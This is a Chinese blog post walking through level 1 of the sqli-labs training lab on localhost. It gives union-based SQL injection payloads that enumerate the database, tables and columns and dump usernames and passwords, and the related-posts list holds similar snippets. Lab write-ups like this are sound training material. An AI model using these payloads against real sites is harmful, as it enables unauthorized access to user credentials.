【网安自学/web漏洞-day01】sqli-labs第一关

已于 2022-05-07 11:08:37 修改
阅读量1.2k 收藏
点赞数
分类专栏: sqli-labs 文章标签: sql
于 2022-05-05 20:02:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/t0410ch/article/details/124596278
版权

Less-1 **Error Based- String**

  1. 原sql为 select * from users where id=1; 判断是否为字符型注入 select * form users where id='1’'
  2. 若界面改变则为字符型注入,猜列名的数量:select * from users where id='1'' order by 5--+

(可以使用二分法进行) ;若为5的时候界面错误,4的时候界面不会报错了说明有三列

  1. 猜显示的位置:
    1.   
      select * from users where id='-1'' union select 1,2,3--+

    2.  (http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3--+)
    3. 显示的数字即是对应的位置。

  2. 信息收集:
    1. 数据库版本:version()
    2. 数据库名称:database()
    3. 数据库用户:user()
    4. 操作系统:@@verson_compile_os
  3. 根据显示的位置查询数据库下的表名、操作系统信息
    1. select * from users where id=-1' union select 1,version(),database()--+ http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,version(),database()--+
    2. 查询到现在使用的数据库为”security”
    3.     

  4. 查询一个指定的数据库名下的表名信息(根据显示位):
    1. http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(table_name),null from information_schema.tables where table_schema='security'--+
    2. 查询到security数据库下有四个表,其中users可能是我们想要的敏感信息

  5. 查询users表。
    1. http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
    2. 查询到users表下有:id,username,password,level字段

  6. 查询users下的username、password字段
    1. http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(username),3 from security.users--+

  7. 同理搜索password

Lu&Tian
关注
专栏目录
sqli-labs-master第一关Less-1Error based - Single quotes - String
weixin_45492475的博客
08-19 382
sqli-labs-master第一关Less-1Error based - Single quotes - String 一、首先进入目标网站,查看显示输入正确时的页面 根据下面提示,输入id值,当我们输入?id=1时得到了一个正确的返回界面 二、判断注入点 1、?id=1’ 判断注入点处是数字型还是字符型,在正确语句后加入一个单引号后,发现报错信息为 ‘‘1’’ LIMIT 0,1’ at...
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3402
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs1-1 with sqlmap
Darklord.W
04-10 207
搭建sqllabs环境 2.使用sqlmap对第一关进行注入,参数越多越好,不仅限于拿到数据 1\判断是否存在注入    http://192.168.8.135/sqli-labs/Less-1/?id=1 2\python sqlmap -u http://192.168.8.135/sqli-labs/Less-1/?id=1 --dbs 查询当前用户下所有数据库 ...
sqli-lab笔记--less01 (Error Based- String
TYW168168的博客
10-17 449
      sqli-lab less01--Error Based- String(基于字符串错误)  (第1节:基于错误 – 字符串)   字符型注入,也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住   TEST   http://127.0.0.1/sqli/Less-1/?id=1'   提示语法错误:           ...
SQLI-LAB  的 实战记录(Less 1 - Less 10)
这块盾牌有待改良
07-15 3932
Less - 1 Error Based- String Less - 2 Error Based- Intiger Less - 3 Error Based- String with Twist
Sqli-Labs:Less-1
weixin_44227437的博客
05-04 400
sqli-1 基于错误_GET_单引号_字符型注入 0x01:判断是字符型注入还是数字型注入
关于sqli-labs中报错Illegal mix of collations for operation ‘UNION‘原因剖析与验证
m0_63103606的博客
05-07 786
使用了union注入时报错如下:Illegal mix of collations for operation ‘UNION payload:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 看网上发现原因是security数据库中表格users的编码与info
sqli-labs(php7.3以上可运行)
01-29
"sqli-labs"是一个专为学习和测试SQL注入漏洞而设计的开源平台,尤其适用于PHP7.3及更高版本的环境。 一、SQL注入基础 SQL注入是由于应用程序没有正确地过滤或验证用户输入的数据,导致这些数据可以直接被解释为SQL...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sql注入手法详解
m0_71299382的博客
11-26 1万+
sql注入总结
sqli-labs:less-1(字符型报错注入)
羽的博客
07-12 172
id=1 id=1 and 1=1(正常) id=1 and 1=2(正常)所以判断不是数字型 id=1'(报差) id=1'--+(正常) id=1' or '1'='1(正常)所以是字符型 id=1' and '1'='2(报错) id=1' order by 1--+ id=1' order by 2--+ id=1' order by 3--+ id=1' order by 4--+(查无此列) id=-1' union select 1,2,3--(返回2,3) id=-1' uni...
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli abs Less-1详解
weixin_43713000的博客
01-25 574
SQL 注入靶场 Sqli labs SQLI-LABS是一个开源靶机; 它将sql注入分为了 basic基本、advanced进阶、stacked堆叠注入、challenges挑战 四个等级; 含有60余个sql注入关卡,较全面的收纳了get及post包下的各类sql注入 方式环境 Less-1 Error Based- String GET - Error based - Single quotes - String (基于错误的GET单引号字符型注入) 第一关是基于字符串的单引号错误 首先在链.
SQLi-Labs 学习笔记(Less 1-10)
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
Mysql-error code汇总
热门推荐
文学超的博客
07-03 5万+
OS error code 1: Operation not permitted OS error code 2: No such file or directory OS error code 3: No such process OS error code 4: Interrupted system call OS error code 5: In
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4355
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
SQL注入语句(详细)
m0_64118193的博客
06-02 2万+
目录一、联合查询1.判断注入点 2.查询字段 3.确定回显点 4.基础查询信息二、报错注入1.substr()函数 2.查询语句三、布尔盲注1.length( )函数 2.substr( )函数 3.ord( )函数 4.查询语句四、时间盲注1.sleep( )延迟函数 2.查询语句五、堆叠注入1.查询语句***爆库语句SQLMAP工具的使用参数用户可控:前端传递给后端的参数内容是用户可以控制的参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询当传入的id参数为
MySQL查询优化:LIMIT 1避免全表扫描
移动编程
03-27 1181
在某些情况下,如果明知道查询结果只有一个,SQL语句中使用LIMIT 1会提高查询效率。 例如下面的用户表(主键id,邮箱,密码): create table t_user( id int primary key auto_increment, email varchar(255), password varchar(255) ); 每个用户的email是唯一的,如果用户使用em...
https://github.com/audi-1/sqli-labs
最新发布
04-07
这是一个名为SQLi Labs的GitHub仓库,其中包含了一系列用于测试和学习SQL注入的实验室。该仓库由开发者Audi-1维护,其中包括了多个难度级别和不同类型的SQL注入实验,旨在帮助开发者加强SQL注入的安全意识和技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值